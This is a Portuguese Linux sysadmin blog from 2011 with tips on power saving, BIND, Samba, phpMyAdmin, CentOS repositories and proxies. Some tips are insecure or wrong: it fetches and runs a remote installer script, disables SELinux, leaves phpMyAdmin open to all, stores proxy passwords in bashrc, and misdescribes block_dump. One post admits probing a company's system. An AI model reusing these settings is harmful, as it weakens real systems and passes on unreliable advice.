BEM VINDO AO BLOG DO MARCOS CARRARO CRIADOR DO "CARRARO DASHBOARD". MUITO MAIS QUE UM SIMPLES BLOG.

quinta-feira, 29 de dezembro de 2011

Notebook + Linux

Salve salve galera,

Último post antes de fechar o ano, algumas dicas para melhorar o Linux no notebook, mais focado para a bateria.

Segue algumas dicas então

- Ativar algumas opções a mais para o nosso disco usando o hdparm
# fdisk -l
Veja qual é o seu disco.
# hdparm -B 1 -S 242 /dev/sda

- Ativar no kernel o modo laptop
# echo 1 > /proc/sys/vm/laptop_mode

- Desativar o uso excessivo do disco pela debugação do kernel
# echo 1 > /proc/sys/vm/block_dump 

- Instalar o Power TOP parecido com o top mas para monitorar a energia, bateria, voltages do notebook. E o mais legal é que ele tem uma guia que te ajuda a tunar o sistema, para melhorar a duração do mesmo!
# apt-get install powertop

E lembre-se bateria cheia, carregador desconectado!
Algumas leituras interessantes de última hora.


Abraços e um 2012 detonador!!!!
Marcos Carraro


Read More

quarta-feira, 7 de dezembro de 2011

Sacanagem.

Buenas Galera,

Como todos sabem o projeto Carraro DashBoard é open source, eu ainda não ganho nada $$, a unica coisa que eu sempre pedi foi que me relatassem as melhorias efetuadas no mesmo, mas adivinhe, até hoje não recebi um tustão, poucos administradores, me repassaram as modificações, e hoje por acaso, brincando na internet, encontrei um sistema para fazer praticamente as mesmas coisa que o carraro dashboard faz, fiquei curioso, até que encontrei um link de um cliente dessa "Empresa bem perto da minha cidade", e fuça daqui, estoura dali, faz um meche, até que cheguei em alguns arquivos, e me deparo com coisas digamos "idênticas".

 To até agora me sentido traido pelos usuários, mas eu sei que no mundo da internet não existe respeito, ainda mais dessas empresas grandes que dizem ter segurança garantida, e isso e aquilo.

 Se você esta lendo isso, e sabe de quem estou falando. Fica tranquilo, juro que não vou fazer nada de maldade, até porque isso não me levaria a nada.

Mas fica a minha dica. Dados de clientes são valiosos!!!!!

Aceito qualquer tipo de presente ainda mais agora no Natal :D

Abraços.
Read More

terça-feira, 6 de dezembro de 2011

quinta-feira, 24 de novembro de 2011

Clonezilla server /bin/sh: Can't access tty; job control turned off

salve salve galera,

Tive um grande baita problema, tenho um servidor clonezilla server para fazer a clonagem de uns HDs, tive que modificar o dhcpd para aquentar o tranco para 60 maquinas a surpresa tive problema ao iniciar

Problema:
"/bin/sh: Can't access tty; job control turned off"

Solução, sai quebrando tudo, servidor, switch, hub, tudo, e a solução mesmo que encontrei foi.

Solução:
yum install drbl clonezilla
reboot

/opt/drbl/sbin/drblpush -i

Dai configurei pra aquentar o tranco para 60 maquinas dei mais um reboot, e pronto, problema resolvido.

Abraços se alguém tiver problema chorra... pq depois funciona :D

Abraços turma



Read More

hardening - BIND9

Buenas turma,

Segue uma dica de hardening para o bind9, tem q função de ocultar a versão do mesmo.

// para descobrir a versão do bind
dig @meuservidor.com.br version.bind txt chaos

// para ocultar a mesma
Dentro da clausula options insira a seguinte linha como no exemplo abaixo.

options {
......
version "[null]";
.......
}

// Autores do bind

desconhecido:~$ dig @meusite.com.br authors.bind txt chaos

Read More

sexta-feira, 18 de novembro de 2011

Limpar tabela arp

Dica rapida e quente.

arp -a // ver todas entradas nas tabelas arp lembrando que é local

arp -d // para eliminar apenas uma entrada da tabela arp.

ifconfig eth1 down && ifconfig eth1 up // faz um dow e up da placa de rede e limpa toda tabela referente a ela.

Desabilitar o arp proxy.
Ativo
echo 1 > /proc/sys/net/ipv4/conf/eth1/proxy_arp

Desativo
echo 0 > /proc/sys/net/ipv4/conf/eth1/proxy_arp

Verificar situação ativado/desativo
cat /proc/sys/net/ipv4/conf/eth1/proxy_arp

Abraços Marcos Carraro
Read More

quarta-feira, 16 de novembro de 2011

Liberando memoria no servidor

Buenas Galera,

Hoje tive alguns imprevistos, pós feriadão e decidi dar uma revisada nos servidores, quando me deparei nos servidores proxy, e file servers, um uso excessivo de memoria, pensei internamente "pqp por isso fica lento no pique." Acabei achando no google uma linha para o sysctl que ajuda a dar um refresh na memoria, e realmente ajuda, até no meu desktop Ubuntu eu fiz e liberou 700mb alivio para quem tem que virtualizar um windows para fazer os trabalhos de C++ HHAHAHAH

Via linha de comando:
# sysctl -w vm.drop_caches=3

Ou no arquivo:
# vim /etc/sysctl.conf 
vm.drop_caches=3

Para mais informações.

Abraços e uma ótima semana.
Marcos Carraro
Read More

segunda-feira, 7 de novembro de 2011

emesene no ubuntu 11.10 via apt

Primeiro devemos adicionar o repositorio do emesene

# add-apt-repository ppa:emesene-team/emesene-stable

Feito isso
# apt-fast update

Depois é so rolar um install
# apt-fast install emesene

E correr para o abraço lembrando, emesene esta na versão 2.11.9

Abraços galera
Marcos Carraro
Read More

domingo, 6 de novembro de 2011

Turbinando apt-get

Buenassssss tardes galera, (Domingo de sol HHHAAH)

Depois de um tempo usando o Fedora como meu linux para desktop, acabei trocando o mesmo pelo bom e velho ubuntu, por algumas particularidades, posso afirma, em servidores, centos é o auge, mas para desktop o Fedora, ainda peca em algumas coisas... não é para todos mas para alguns... HEEH

segue algumas dicas que eu sempre usei nos meus ubuntus...

Para adicionar mais repositiorios no ubuntu segue um site show de bola.
http://repogen.simplylinux.ch/repositórios

Para trocar o apt-get pelo apt-fast segue o link do repositior. Serve para melhorar a velocidade dos downloads dos pacotes.

# add-apt-repository ppa:tldm217/tahutek.net
# apt-get update
# apt-get install apt-fast
# apt-fast update

Depois disso, adeus o apt-get comece a utilizar o comando apt-fast para atualizar, instalar novos pacotes.

Mais adiante, faço um post para deixar o ubuntu redondinho.

Abraços Galera, e bora aproveitar esto domingão de sol
Marcos Carraro

Read More

Fedora 15 - perfect desktop - resenha

Salve salve Galerinha...

Finalmente após aos de "sofrimento econômico HAHAHHA" comprei meu notebook Lenovo G460, o bichinho é bom, quem for comprar não vai se arrepender....

De cara já formatei, instalei o meu Windows 7, já que eu ganhei o registro tenho que aproveitar o Tio Bio, de logo instalei o linux, me inventei de testar o Scientific Linux, bha, para notebook, não é legal, é meio lento, falta pacotes, tem que compilar muita coisa, e para um desk, a ideia que eu tenho é que o linux tem que ser super leve e rápido, sem muita frescura...

Como estou voltado em estudos nos Red Hat, no caso o Centos, nada melhor do que uma distro baseada do mesmo, instalei o bom e velho Fedora 15.

De cara percebi uma coisa, a wireless não rolava, bom é de costume não funcionar na maioria dos linux no notebook...
#-- Lá vamos, configurando wireless Broadcom BCM4313 no notebook.

lspci | grep -i broadcom
 05:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g LP-PHY (rev 01)

yum search broadcom

yum install broadcom-wl

Ele vai instalar o kmod também.

Caso não encontre, ative os principais repositórios, rpmfucion. atomic, livna...

Feito as instalações, reboot.

#-- Habilitando o menu no grub
cd /boot/grub
vim menu.lst
comenta a linha hiddenmenu

#-- Habilitando botoes desligar - reiniciar
yum install gnome-shell-extensions-alternative-status-menu


#-- Turbinando o yum
yum install axel
cd /etc/yum
wget http://cnfreesoft.googlecode.com/svn/trunk/axelget/axelget.conf
cd /usr/lib/
wget http://cnfreesoft.googlecode.com/svn/trunk/axelget/axelget.py

#-- Google Chrome
http://www.google.com/chrome/thankyou.html?hl=pt-BR&platform=linux_fedora_i386
Ao instalar o chrome, tive problema com o twitter, ele não carregava a pagina, dava aquele erro louco ah não, algo assim... quebrei a cabeça para descobrir o que era, já tinha passado uma vez por isso, o que eu fiz, foi desabilitar o selinux
vim /etc/sysconfig/selinux
e coloque para disabled

#-- Personalizando o GNOME 3
yum install gnome-tweak-tool
Procure no painel do Fedora, o aplicativo, vai estar com o nome de "Ajuste Avançado de Configuração"

#-- Instalando alguns temas
yum install gnome-shell-extensions-user-theme

Tem diversos temas,  o que mais eu curti foi este
Feito o download extraia o conteudo 
unzip -e pacote.zip
depois mova para o diretorio
mv tema /usr/share/themes

Depois habilite o tema no Tweak Tool > Windows > Current Theme

#-- Habilitatar os iconex no desktop
alt + f2
deconnf-editor
org -> gnome -> desktop -> background -> show-desktop-icon
s

Bhaa, galera, estava com este post trancado a meses, por motivos maiores, acabei trocando o fedora depois de tempos usando o mesmo, devido algumas particularidades. EEHEHEH

Aproveitem esta resenha, abraçossssss marcos carraro
Read More

sexta-feira, 28 de outubro de 2011

Monitoramento de eth ou da rede

Buenas Galera,

Vou deixar aqui dois softwares que acho fundamentais para saber a velocidade da eth, estou postando ambos hoje, pois estou utilizando Clonezilla Server e queria ver se esta utilizando o máximo da minha placa de rede.

Fica a dica então.

bwm-ng http://sourceforge.net/projects/bwmng/

ethstatus - Não achei o link, também não forcei a busca HAHAH.

Extra :D

etherape - Esse cara é mais amplo, consegue pegar muito mais informações, tem filtros, so que não consegue-se usar em linha de comando.

Um bom uso a todos, e até a próxima dica.

Abraços Marcos Carraro
Read More

segunda-feira, 24 de outubro de 2011

Samba montar iso automaticamente

Buenas, dica rápida e quente, sem mais delongas.

Montar arquivos .iso automaticamente no samba, é so jogar os arquios .iso em um determinada paste, o samba vai vasculhar, e vai montar em outro diretório compartilhado a imagem.

vim /etc/samba/smb.conf

// aqui vai ser jogado todos os arquivos .iso

[ISO-HOME]
path = /var/samba/manutencao/iso-home
admin users = restrito
valid users = restrito
writable = yes
force create mode = 0777
force directory mode = 0777
public = yes

// aqui vai ser o ponto de acesso de todos os arquivos montados na parte de cima.
[Unidades-Virtuais]
path = /var/samba/unidades
admin users = restrito
valid users = restrito
public = yes
read only = Yes
browseable = Yes
root preexec = /bin/isomount mount

vim /bin/isomount

#!/bin/bash

#local onde ficam os arquivos.iso
ISODIR="/var/samba/manutencao/iso-home"

#local onde vao ser montados as imagens
MNTDIR="/var/samba/unidades"

case $1 in
  mount)
    # Check first
    mnted=`mount | grep iso | awk '{print $1}'`
    for cd in $mnted; do
      if [ ! -e "$cd" ]; then
        echo -n "Umounting $cd..."
        umount -f $cd
        test $? -eq 0 && echo "OK"
        name=`basename $cd`
        name="`echo $name | cut -f1 -d.`"
        test -d $MNTDIR/$name && rmdir $MNTDIR/$name
      fi
    done
      if [ -e "$ISODIR/$2" ] && [ "$2" ]; then
      name="`echo $2 | cut -f1 -d.`"
      if [ -z "`echo $mnted | grep $2`" ]; then
        echo -n "Mounting $name: "
        test -d $MNTDIR/$name || mkdir $MNTDIR/$name
        mount -t iso9660 -o loop,ro $ISODIR/$2 $MNTDIR/$name
        test $? -eq 0 && echo "OK"
      fi
    elif [ -z "$2" ]; then
      for iso in `ls $ISODIR/*.iso`; do
        name=`basename $iso`
        name="`echo $name | cut -f1 -d.`"
if [ -z "`echo $mnted | grep $iso`" ]; then
          echo -n "Mounting `basename $iso`: "
          test -d $MNTDIR/$name || mkdir $MNTDIR/$name
          mount -t iso9660 -o loop,ro $iso $MNTDIR/$name
          test $? -eq 0 && echo "OK"
fi
      done
    fi
  ;;
  umount)
    if [ -e "$ISODIR/$2" ] && [ "$2" ]; then
      name="`echo $2 | cut -f1 -d.`"
      if [ "`mount | grep $MNTDIR/$name`" ]; then
        echo -n "Umounting $name: "
        umount $MNTDIR/$name
        test $? -eq 0 && echo "OK"
        test -d $MNTDIR/$name && rmdir $MNTDIR/$name
      fi
    elif [ -z "$2" ]; then
      for iso in `ls -1 $ISODIR/*.iso`; do
        name=`basename $iso`
        name="`echo $name | cut -f1 -d.`"
        if [ "`mount | grep $MNTDIR/$name`" ]; then
          echo -n "Umounting `basename $iso`: "
          umount $MNTDIR/$name
          test $? -eq 0 && echo "OK"
        fi
        test -d $MNTDIR/$name && rmdir $MNTDIR/$name
      done
    fi
  ;;
  *)
    echo "Usage: $0 {mount|umount}"
  ;;
esac
exit 0




Feito isso chmod +x /bin/isomount

/etc/init.d/smb restart

E bom proveito.


Abraços Marcos Carraro

OBS 15:04 :. Não cole os arquivos.iso com nomes separados por espaço " ", crie nomes simples como programa_do_desenvolvimento_Y_X_D.iso
Read More

quarta-feira, 19 de outubro de 2011

Dia do profissional da informática o tal do PPTO - 19 de outubro

Salve salve leitores do blog, é com enorme satisfação que eu desejo a vocês muita paciência, saúde, e sucesso para darmos continuidade a esta carreira solo, ou em duplas, e ainda mais em grupos!

Segue um link com um texto legal de se ler.

http://www.iotecnologia.com.br/dia-profissional-informatica

Um forte abraço Marcos Carraro.

* Antes que me peçam o que significa PPTO - Pau Para Toda Obra!
Read More

segunda-feira, 17 de outubro de 2011

Desabilitar ipv6 no centos 6 definitivo

Insira a linha ipv6.disable=1 no arquivo /boot/grub/menu.lst como no exemplo abaixo!

title CentOS Linux (2.6.32-71.29.1.el6.x86_64)
root (hd0,0)
kernel /boot/vmlinuz-2.6.32-71.29.1.el6.x86_64 ro root=UUID=62252c5f-e635-4975-abe1-74dcca43d50a rd_NO_LUKS rd_NO_LVM rd_NO_MD rd_NO_DM LANG=pt_BR.UTF-8 SYSFONT=latarcyrheb-sun16 KEYBOARDTYPE=pc KEYTABLE=br-abnt2 crashkernel=auto  ipv6.disable=1

Boa sorte
marcos carraro
Read More

Mysql + phpMyadmin gerenciando múltiplos domínios

Salve salve galera,

Após ficar uma semana, em cima do servidor, lendo, entendendo como funciona, o mysql, o phpmyadmin, entendendo os arquivos de configuração, e na internet não tem nada para ajudar, so algumas coisas na wiki, vou mostrar para vocês com o é fácil fácil!

vim /etc/hosts


172.16.1.252 servidor1.dominio servidor1
172.16.1.251 servidor2.dominio servidor1

======================================================
O mysql deve estar escutando na porta 3306 em qualquer ip então
======================================================

vim /etc/my.cnf
Adicione dentro de [mysqld] as seguintes linhas!

#bind-address=172.16.1.251
port=3306

======================================================
Agora é hora de criar os usuários para o mysql, lembre de ter instalado o mesmo yum install mysql-server -y
======================================================
// Importante são duas linhas

CREATE USER 'root'@'172.16.1.252' IDENTIFIED BY 'senhaservidor1';

GRANT ALL PRIVILEGES ON * . * TO 'root'@'172.16.1.252' IDENTIFIED BY 'senhaservidor1' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;

=======================================================

CREATE USER 'root'@'172.16.1.251' IDENTIFIED BY 'senhaservidor2';

GRANT ALL PRIVILEGES ON * . * TO 'root'@'172.16.1.252' IDENTIFIED BY 'senhaservidor2' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;

=======================================================
Depois de criado os usuários, pode até testar para verificar se esta conectando,

mysql -u root -h 172.16.1.251 -p

Phpmyadmin Agora é que vem o pulo do gato HEHEHHE.
Download do mesmo
========================================================
cd /var/www/

wget http://sourceforge.net/projects/phpmyadmin/files%2FphpMyAdmin%2F3.4.6%2FphpMyAdmin-3.4.6-all-languages.tar.gz

tar -xvsf phpMyAdmin-3.4.6-all-languages.tar.gz

mv phpMyAdmin-3.4.6-all-languages phpmyadmin

========================================================
No apache criar os alias, mais os virtuais

cd /etc/httpd/conf.d/

# servidor1.conf
listen 172.16.1.252:80
Alias /servidor1 /mnt/500/servidor1
<VirtualHost 172.16.1.252>
<Directory /mnt/500/servidor1/>
Order Deny,Allow
Allow from All
</Directory>
</VirtualHost>

#servidor2.conf
listen 172.16.1.251:80
Alias /servidor1 /mnt/500/servidor2
<VirtualHost 172.16.1.251>
<Directory /mnt/500/servidor2/>
Order Deny,Allow
Allow from All
</Directory>
</VirtualHost>

#phpmyadmin.conf
Alias /phpMyAdmin /var/www/phpmyadmin
Alias /phpmyadmin /var/www/phpmyadmin

<Directory /var/www/phpmyadmin/>
   Order Deny,Allow
   Deny from All
   Allow from All 
#127.0.0.1
   Allow from ::1
</Directory>

<Directory /var/www/phpmyadmin/setup/>
   Order Deny,Allow
   Deny from All
   Allow from All
#127.0.0.1
   Allow from ::1
</Directory>

# These directories do not require access over HTTP - taken from the original
# phpMyAdmin upstream tarball
#
<Directory /var/www/phpmyadmin/libraries/>
    Order Deny,Allow
    Deny from All
    Allow from None
</Directory>

<Directory /var/www/phpmyadmin/setup/lib/>
    Order Deny,Allow
    Deny from All
    Allow from None
</Directory>

<Directory /var/www/phpmyadmin/setup/frames/>
    Order Deny,Allow
    Deny from All
    Allow from None
</Directory>

# This configuration prevents mod_security at phpMyAdmin directories from
# filtering SQL etc.  This may break your mod_security implementation.
#
#<IfModule mod_security.c>
#    <Directory /usr/share/phpMyAdmin/>
#        SecRuleInheritance Off
#    </Directory>
#</IfModule>

================================================================
Reiniciar apache

/etc/init.d/httpd restart

================================================================

Agora devemos configurar o config.inc.php do phpmyadmin.


<?php
/* Servers configuration */
$i = 0;

//senha secreta
$cfg['blowfish_secret']='root';

/* Server [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'servidor1';
$cfg['Servers'][$i]['host'] = '172.16.1.251';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['socket'] = '3306';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['compress'] = true;
$cfg['Servers'][$i]['auth_type'] = 'cookie';

/* Server:  [2] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'servidor2';
$cfg['Servers'][$i]['host'] = '172.16.1.252';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['socket'] = '3306';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['compress'] = true;
$cfg['Servers'][$i]['auth_type'] = 'cookie';

/* End of servers configuration */

$cfg['DisplayServersList']    = TRUE;
$cfg['DefaultLang'] = 'pt_BR';
$cfg['ServerDefault'] = 0;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
?>

======================================================

Vualá, pode acessar pela web, que o phpmyadmin já esta gerenciando os outros servidores, pode reparar que ele vai cair numa tela, com algumas informações, perceba que ele mostrará dois links um para o servidor1 e outro para o servidor2, lá você vai ter que se logar com usuário root e a senha criada para cada dominio.

Espero que seja útil para mais alguém, pois para mim foi de grande ajuda, assim não precisei virtualizar quase nada.

Abraços a todos.
Marcos Carraro
Read More

quinta-feira, 6 de outubro de 2011

Download Videos da web, youtube, vimeo...

Achou aquela video aula no youtube, achou aquele workshop no vimeo, e não sabe como baixar, já instalou vários complementos para o navegador baixar os vídeos???

Seus problemas acabaram, AHAHHAHAA, chegou o site http://savevideo.me/ O quebra galho para toda hora!

Bons Downloads agora.
Read More

Cansou do gedit?

O gedit, com vários Plugins nem sempre é uma boa saída, ainda mais quando se tem que fazer alguma programação, tanto em bash, c++, qualquer coisa....

Acabei achando por acaso na internet o Geany IDE.
 http://www.geany.org/

Gostei dele, ele faz toda organização do código, assim não precisa ficar dando aqueles tab, espaço daqui, e isso aqui ali... muito útil! Vale a pena testar.

 yum install -y geany.i686

Read More

sábado, 24 de setembro de 2011

Palestra HPING TcheLinux Caxias do Sul.

Palestra HPING TcheLinux.



Read More

quarta-feira, 21 de setembro de 2011

EasyLife Fedora 15 + proxy na rede

Salve Salve Galera,

Hoje, estou (21/09) na faculdade, e precisei atualizar algumas coisas no meu fedora, bha, todos sabem a mão que é procurar pacote por pacote, instalar, verificar se funciona ou não, em fim... Já tinha ouvido falar do easylife, é um sistema, onde você escolhe algumas opções para automatizar a instalação das ferramentas do Fedora, como codecs, impressora PDF, drive de video entre outros.
Mas dai veio o problema, to na facu, a porcaria do proxy daqui é autenticado, me ferrei, já usava o export para usar o yum update sem dor de cabeça, vou passar para vocês as manhas e barbadas que é ter o fedora atualizado e redondo.

Setando proxy para todos os usuários.

# vim /etc/bashrc
# proxy da rede

export http_proxy="http://meuusuario:minhasenha@172.28.101.254:3128"
export ftp_proxy="ftp://meuusuario:minhasenha@172.28.101.254:3128"

Para usuário root
# vim /root/.bashrc

Para seu usário
# vim ~/.basrch

Instalando o easylife
http://www.easylifeproject.org/

rpm -ivh easylife...rpm

logue-se com root
su
#easylife

e marque os pacotes ok

e Aproveite.

Abraços Marcos Carraro
Read More

segunda-feira, 15 de agosto de 2011

Instalando o painel Carraro DashBoard

Salve Galera,

É com muito orgulho, que estou disponibilizando o material para fazer a instalação do painel.

Versão IP: http://goo.gl/rBTBC
Versão Usuário: Finalizando
Versão Misto: Testes

Manual de instalação pdf:

Palestra TcheLinux BrOffice: http://goo.gl/tzmPM






Manual de instalação do painel: http://goo.gl/ReRq4


Read More

terça-feira, 9 de agosto de 2011

Hardening Linux - Direto da Nsa

Bom Dia!

Nada melhor do que uma terça-feira com chuva.

Vamos ao que interessa, diretamenta da NSA, estou disponibilizando alguns materiais para melhorar a segurança do seu linux, muito recomendado fazer uma breve leitura.

http://www.nsa.gov/ia/_files/factsheets/rhel5-pamphlet-i731.pdf


http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

Demais sites

https://opensource.homeunix.com/papers/files/281.pdf

http://www.linux-op.com/downloads/RedHat-Press-Red-Hat-Linux-Security-and-Optimization.pdf

Lembrando que temos hardening para o SO, e serviços...

Boa Iniciativa na melhoria da segurança HEHHEHE

abraços Marcos Carraro
Read More

quinta-feira, 28 de julho de 2011

Squid - pegando informações

Bom Dia Galera,

Hoje vai uma dica que me ajudou na descoberta em que o problema não era o meu proxy que gerava a lentidão EHEHEHHE.

Serviço utilizados: squidclient
No redhat: /usr/sbin/squidclient

/usr/sbin/squidclient -h 172.19.0.1 -p 3128 mgr:info
/usr/sbin/squidclient -h 172.19.0.1 -p 3128 mgr:utilization
/usr/sbin/squidclient -h 172.19.0.1 -p 3128 mgr:menu

Por hoje já eras...

HEHEHHE

Abraços, e lembrando, o grande dia esta chegando http://goo.gl/1WGcS

Read More

quarta-feira, 20 de julho de 2011

Centos 6 Review - Do meu ponto de vista

Bom Dia...

Antes de mais nada um ótimo feliz dia do amigo a todos.

Seguinte, hoje pela manhã comecei a refazer um servidor gw, e pensei porque não instalar o centos 6, ok, fui instalar o micro não é dos mais atualizados mas da conta do recado, primeiro problema, não detectou drive de vídeo, putz, ferou pensei, liguei o disco em outro micro e ficou tudo na santa paz, mas porque tive que ligar em outro micro? Olha sem drive de vídeo a instalação fica no modo texto, e nesse modo texto não me dava opção para particionar o disco, coisa que eu não curto é manter tudo no coitado "/"

Instalação show de bola, ele tem a opção para instalar em "server" acredito que faz melhorias no kernel para obter melhor desempenho, não instalou a interface X, na imagem a baixo da ionternet, mostra a opção, no caso o usuário selecionou Minimal Desktop, eu utilizei Baseic Server


Após instalação coloquei o HD de volta ao servidor, o qual o Centos não conseguiu detectar o drive de vídeo.
Liguei ele normalmente, fiz as modificações na bios, desabilita áudio, porta lpt... coisas de rotina, quando fui iniciar o centos, ele carrega de uma maneira diferente, por um lado bonita, bem diferente que é algumas barras azuis. Eu falei porra, eu não curto isso, prefiro ver o modo texto idêntico do Slackware. Comecei a luta, como o sistema é novo não achei na net nada, na verdade procurei e larguei de mão no mesmo instante decidi meter a mão na massa literalmente. Só tem um lugar onde eu poderia mexer, com certeza não seria um /proc/sys/novobootcentos Oo claro que não seria no Grub. (:

Barbadinha, o que eu fiz, foi remover algumas linhas que eu achava desnecessárias.

# vim /boot/grub/grub.conf
Procure por estes dois caras "rhgb quiet" sem aspas é claro, eles estão ao final da linha do kernel... e remova
os mesmos. ou quebre a linha e comente-os. É preferível quebrar a linha e comentar ambos, vai que um dia você deseja voltar a tela bunitinha HAHHAHAHHA.

#rhgb
#quiet


De um reboot, e curta a nova tela de boot, (: prefiro ter coisas mais detalhadas para saber o que se passa por trás.

Adicionei alguns repositórios. Como rpmforge

#wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.i686.rpm
#rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt
#rpm -ivh rpmforge-release-0.5.2-2.el6.rf.i686.rpm

#wget hhttp://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-5.noarch.rpm
#wget http://download1.rpmfusion.org/free/el/updates/testing/6/i386/rpmfusion-free-release-6-0.1.noarch.rpm
#wget http://download1.rpmfusion.org/nonfree/el/updates/testing/6/i386/rpmfusion-nonfree-release-6-0.1.noarch.rpm
#rpm -ivh epel-release-6-5.noarch.rpm
#rpm -ivh rpmfusion-free-release-6-0.1.noarch.rpm
#rpm -ivh rpmfusion-nonfree-release-6-0.1.noarch.rpm

#wget http://rpms.famillecollet.com/enterprise/remi-release-6.rpm
#rpm -ivh remi-release-6.rpm

#wget http://www.atomicorp.com/installers/atomic
#chmod +x atomic
#./atomic

#yum update

Agora aguarde até que ele faz um "index" dos repositórios

Depois disso, recomendo a litura do blog do nosso amigo Gustavo "Coruja de TI" http://goo.gl/41at7
 tem alguns PDF's para melhorar a segurança do centos.

Também recomendo a leitura de uma dica que publiquei no VivaoLinux http://goo.gl/ONCOe

O blog fica portas abertas, a quem quiser compartilhar informações de como melhorar a segurança, alguns passos pós instalação... Qualquer coisa só entrar em contato.

Abraços Marcos Carraro

PS: Esqueci de colocar uma coisa que eu acho interessante no servidor, que é o cm mv rm com barra de progresso, parece "balaca" mas quando você tem arquivos gigantes, ou ditórios grandes, é bom ter uma feedback de como estão indo as coisas.

Download http://goo.gl/gD98M

#tar -cvvf  backup_bin.tar /bin/cp /bin/mv /bin/rm
#tar -xvsf cmdbar.tar -c /bin

Depois crie um alias....

#vim /etc/bashrc
alias cp='cp -B'
alias mv='mv -B'
alias rm='rm -B'

Agora é so curtir.... ao passar dos tempos vou alimentando esse post. Valeuuu
Read More

sexta-feira, 15 de julho de 2011

wlmproxy - um proxy para msn superior

Buenas Galera,

Hoje, estive a procura de um proxy para msn que funciona-se com a versão 2011, na busca, por padrão sempre tem o tal do MSN-PROXY, que agora não esta dando mais suporte, encontrei no blog do William Lima http://primate.com.br/ , logo mandei um e-mail para ele, vi que o projeto é brasileiro, então entrei em contato, troquei algumas idéias, ele explicou-me como funciona o sistema, falou das funções, e as funções são várias, nem comparar com o msn-proxy.

Algumas funções,
- Suporte para Acls com wildcard characters (caracteres curinga), por exemplo, bloquear qualquer evento (contato, mensagem) para o domionio foo.com.br;

- Usuário especifico não pode conversar com o fulano@foo.com.br;

- Filtragem de palavra-chave com suporte a expressão regular;

- Suporte a protocolos do MSN, que vai da versão 8 a 21;

Entre outras tantas, que pode conferir no blog do autor, o único problema, ainda é que não tem uma interface web para gerenciar o mesmo, estava conversando com o autor Willian, em ajuda-lo a desenvolver esta interface, já que pelo visto vai substituir o velho msn-proxy.

Como todos já sabem tenho um painel para gerenciar o squid via web, a idéia seria fazer uma fusão, e incorporar o wlmproxy juntamente do painel.

Quem quiser ajudar a desenvolver a interface web, pode entrar em contato pelo blog, ou direto com o autor Willian.

E vamos, lá já vou começar a bolar algo, espero de receber vários e-mails. EEHHEHEH

Abraços a todos e um ótimo final de semana.

Marcos Carraro

Editado 06/07: Para mais informações para manipular diretamente no banco de dados. https://github.com/poetinha/wlmproxy/issues/1

Editado 24/08: Lista de e-mails




Geral
http://lists.wlmproxy.org/cgi-bin/mailman/listinfo/wlmproxy-devel

Atualização no código (commits)
Read More

terça-feira, 12 de julho de 2011

CentOS 6 - Torrent

Após algum tempo, de ser lançado o Red Hat Enterprise 6, foi a vez do centos fica em desenvolvimento cerca de 8 meses até ficar redondinho HEHEHEH, e agora já esta nas redes para download em vários links, em especial torrent.

Download do Torrent, x64 e x86.
http://goo.gl/zpO9X
Para saber o que vem de novo no CentOS 6 segue a documentação em Português.
http://wiki.centos.org/Manuals/ReleaseNotes/CentOS6.0/BrazilianPortuguese

Boa Sorte, aproveitem que os seeders estão em alta (:

Já estou indo testar o meu, quem testou, e pode passar alguns reviews já agradeço.

Abraços Marcos Carraro
Read More

sexta-feira, 8 de julho de 2011

Instalando Carraro DashBoard - How To install carraro-dashboard

Buenas Tarde Turma,

Queria publicar hoje mesmo o manual de instalação do Carraro Dashboard, mas quero fazer isso no evento que acontecera em Bento Gonçalves dia 13 de Agosto.

Até lá eu postarei dicas, mas o manual completo vai ser publicado somente no dia. HEHHEHEH.

Para adiantar, agora o painel conta com duas versões, a versão IP, e a versão Usuário, qual a diferença?
IP - Trabalha com ips da rede, e mac, não contando com autenticação do usuário.
Usuário - Trabalha com autenticação de usuários e MAC.

Todas versões tem uma cadeia, que funciona da seguinte maneira.
Livre "Full" - Ips, MAC, usuários cadastrados nesta cadeia terão acesso total, não sendo barrados no squid.
Default - Nesta regras, os participantes, estão sobre alguns bloqueios, que o admin vai setar.
Bloqueados - Nesta parte, o usuário é totalmente bloqueado, sem acesso a nada, exceto, aos domínios liberados pelo admin.

Pacotes necessários para funcionamento.
php
apache
squid
nmap
dhcp

Ao decorrer do mês vou postando mais dicas.

No arquivo que você baixou do github tem um arquivo chamado ATENCAO nele tem um mini tutorial de instalação, é antigo, mas vale para situar-se melhor na instalação.
Read More

10 motivos para comparecer ao TcheLinux Bento


Dia 13 de Agosto de 2011 ocorrerá em Bento Gonçalves o maior evento de software livre que já ocorreu por aqueles bandas (http://tchelinux.org/site/doku.php?id=evento_2011_agosto_bento), organizado pelo ilustrissimo Rafael Jaques (http://www.phpit.com.br/). Eu certamente vou de toda forma, mas para aqueles que ainda precisam de algum motivo para ir, ai vai uma lista deles:
1 – A entrada no evento é franca, gratuita, na faixa, livre, etc… Logo, nada de chororo sobre o preço de inscrição não.
2 – Quem precisar de atestado de participação, é só levar dois Kilos de alimento não perecível. Além de participar de um evento de qualidade, estarás ajudando pessoas carentes :)
3 – Vai ter caravana de Pelotas. 13 vagas sobrando, 60 reais por pessoa. Baratissimo, vai e volta na colada do evento. Maiores informações comigo (jeronimo.madruga@gmail.com) ou com a Camila Gamino (camilagamino@gmail.com).
4 – 8 horas quase ininterruptas das mais variadas palestras, tudo sobre software livre. Sem propaganda, sem pessoas metidas a besta, sem filosofias que não se aplicam na prática. Só tecnologia e conhecimento sendo compartilhados.
